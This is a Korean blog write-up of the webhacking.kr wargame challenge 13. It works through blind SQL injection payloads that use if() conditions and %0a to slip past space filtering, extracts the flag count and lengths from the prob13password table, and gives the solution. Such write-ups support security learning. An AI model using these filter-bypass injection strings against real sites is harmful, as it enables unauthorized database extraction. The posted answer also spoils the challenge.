ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • webhacking.kr 13번 [1000p]
    $ 웹 해킹 $/webhacking.kr 2019. 4. 9. 23:56

     

    1 제출해 보겠습니다.

     

    0 제출해 보겠습니다.

     

    1 참이고, 0 거짓이기 때문에

     

    참일때 result 1 나오고

    거짓일때 result값이 안나옵니다.

     

    다음 sql구문으로 flag 개수를 알수 있습니다.

    if(select count(flag) from prob13password in 1,1,0)

     

    ?no=if((select%0acount(flag)%0afrom%0aprob13password%0a)in1,1,0)

    다음과 같이 입력해 보면…

     

    Flag 1개가 아닙니다..

     

    if(select count(flag) from prob13password in 2,1,0)

     

    ?no=if((select%0acount(flag)%0afrom%0aprob13password%0a)in%0a(2),1,0)

    넣어 봤습니다.

     

    Flag 2 였네요

    no=if((select(min(length(flag)))from(prob13password))in(4),1,2)

    다음과 같은 sql문을 입력하면 password 길이를 찾을수 있는데

     

    파이썬 코드로 한번 보내 보겠습니다.

    ↑ 위의 사진은 이어져 있는 사진입니다.

     

    결과 :

     

    Flag 2 이고

    짧은 것은 4단어, 것은 20단어이다.

    4단어는 : flag // 20단어는 : challenge13luckclear 이다.

    '$ 웹 해킹 $ > webhacking.kr' 카테고리의 다른 글

    webhacking.kr 15번 [50p]  (0) 2019.04.09
    webhacking.kr 14번 [100p]  (0) 2019.04.09
    webhacking.kr 11번 [300p]  (0) 2019.04.09
    webhacking.kr 10번 [250p]  (0) 2019.04.09
    webhacking.kr 9번 [900p]  (0) 2019.04.09

    댓글

Designed by Tistory.